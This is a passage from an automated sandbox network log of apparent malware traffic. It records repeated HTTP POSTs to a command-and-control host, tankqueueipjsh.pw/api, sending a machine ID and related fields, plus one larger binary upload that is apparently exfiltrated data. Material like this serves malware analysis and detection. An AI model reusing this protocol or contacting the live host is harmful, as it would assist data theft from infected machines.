                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.866734982 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        34192.168.2.550220104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.976241112 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.976660967 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.236589909 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=34o8416ejgpnrv7h73go2a1iun; expires=Sun, 31 Mar 2024 07:21:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:19 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:19 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:19 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Li2DJdt%2FxbWX%2FTgXJnOIXcQjPyA0RZ81CCYoh7PLBNX%2BUfkPXQ%2FzCHpEi2iE6jIRL%2F%2F146Y0nTEEyoB%2BxbRstXCH3Dup39xri4B5D%2BdRQ1Qa30EoPFn%2FDoXedN7xb7NA115WmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.236659050 CET132INData Raw: 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 34 66 64 63 33 65 30 38 32 32 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: erver: cloudflareCF-RAY: 8314e94fdc3e0822-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.236696005 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        35192.168.2.550221104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.535345078 CET337OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 20560
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.535871029 CET11628OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.654146910 CET1340OUTData Raw: 5d 75 9f b7 33 87 fa 9d ec fa 4a 6b 3b 8d 4b 4c 74 dd d1 b3 83 ed 79 ce ad ed bf cf ea e6 fa 75 bd e1 d2 2e 2f eb 33 d9 e8 95 a9 57 77 ad 21 b5 1e 39 2b 89 83 fd fa 5a 29 bc b6 a3 f6 99 b5 b2 46 4b 99 ec c8 81 a8 af c4 da be 66 a2 6f 22 6b d2 b2
                                                                                                                                                                                                                                                                        Data Ascii: ]u3Jk;KLtyu./3Ww!9+Z)FKfo"kZ.">38_LYkd.ck^{~^m"h~#tsY3_d~bY]OPfKbu4Uj\x;T^*OWn
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.654539108 CET7754OUTData Raw: 28 fd 54 67 d6 b9 07 3b 17 56 af 8e 8e 7c b0 34 fd c8 b9 7d d5 87 a7 1e 3a ba fd a6 8b 87 5e f9 dd 60 38 de 80 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a6 0d 45 ff b2 e1 8b 41 f8 1f c3
                                                                                                                                                                                                                                                                        Data Ascii: (Tg;V|4}:^`8EAo_(|1q7Hli3>m2h<6=K?~p[\j ^l8_?GQ
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.053947926 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=r4u6jau7o5o2rabntdoe7q15pp; expires=Sun, 31 Mar 2024 07:21:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:19 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:19 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:19 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=clk4IwjPrEgAqRMAzyqfs4IYyUHA3itHUNsY6f2Yrt38ObmQ0UCc7xB%2FXpLcwpHSudT52U06pImYI6x6o4XQZ7cZA89BCeqzv906G2Xh%2FW942VDSoiGcUjgXkzhkqDMqMqTUNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.053965092 CET113INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 35 33 37 65 36 63 35 62 36 61 2d 49 41 44 0d 0a 0d 0a 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 38 33 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e9537e6c5b6a-IAD10ok 102.165.48.83
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.053977013 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        36192.168.2.550222104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.165002108 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.165221930 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.433859110 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=md3ui3e9olnlb8o0lj13jhvvem; expires=Sun, 31 Mar 2024 07:21:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:20 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:20 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:20 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IM%2F9WxHSib4eJV0bYTuGKcVbHGftrfXl%2BqqABXEpPR%2FbxPLvM2NM%2FYi7EgWShItFkvtgXwfg16fuQjznldPgk5amQ4aQViajih71THcsO2DMc8iD9LhJt7%2BQ3lpMmRyGMpEJtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server:
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.433898926 CET124INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 35 37 34 66 65 37 33 39 33 61 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: loudflareCF-RAY: 8314e9574fe7393a-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.433913946 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        37192.168.2.550223104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.538625002 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.538914919 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.889841080 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=gbein5hci52eftuid06p41rnfj; expires=Sun, 31 Mar 2024 07:21:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:20 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:20 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:20 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xksAzhUCRbSpSq%2F7%2B3w7gBKfgxSGUqyG8iAk%2FVetCydE5cOoT3wB1RGAKh52Nq1WMOkYQ7%2F%2FWGEZRwBDrpuwCjqQX3cFPbFs0xruP6acP6Mw9KiN7x0wTGF%2Fj06UGpz%2BUt1G3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Serv
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.889863968 CET128INData Raw: 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 35 39 39 64 35 62 30 35 37 66 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: r: cloudflareCF-RAY: 8314e9599d5b057f-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.889879942 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        38192.168.2.550224104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.993309021 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.993860006 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.346218109 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=1bhl5dfehc0257on8rao7e44fp; expires=Sun, 31 Mar 2024 07:22:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:21 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:21 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:21 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kb%2BI%2BzotqEh3nBpkCEq8sqB7AOf4E14X8F7r5ULdQOMW7q9tzhOCd0EF4b%2F3FAPUu%2BZ6P4eynkKmD%2Fdddwi9nYnahewPCl7GdBE2gh7%2BILd96UAbFDbjdIAOe9qyfNJnGnuaog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.346271992 CET126INData Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 35 63 37 65 31 66 33 38 31 32 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: cloudflareCF-RAY: 8314e95c7e1f3812-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.346369028 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        39192.168.2.550225104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.454694033 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.454925060 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.732966900 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=6u6hj8pl4vr6di6gg2duicg8qu; expires=Sun, 31 Mar 2024 07:22:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:21 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:21 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:21 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U93iUzwCm%2Fl%2ByRr0rM3vZVVNf3%2F8Yt8IBNcZibgTVNDmVZGrqV1qnn6ehIgrrUOxY6hshBMqTUTxve8dTrxw%2BDCYNGFI6AVdzDp0HjQx7sDqvhRtBR5ybuC3mjlQEmf0Gbd%2BtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server:
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.732997894 CET124INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 35 66 35 39 30 31 33 39 38 63 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: loudflareCF-RAY: 8314e95f5901398c-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.733103037 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        40192.168.2.550226104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.832801104 CET335OUTPOST /api HTTP/1.1
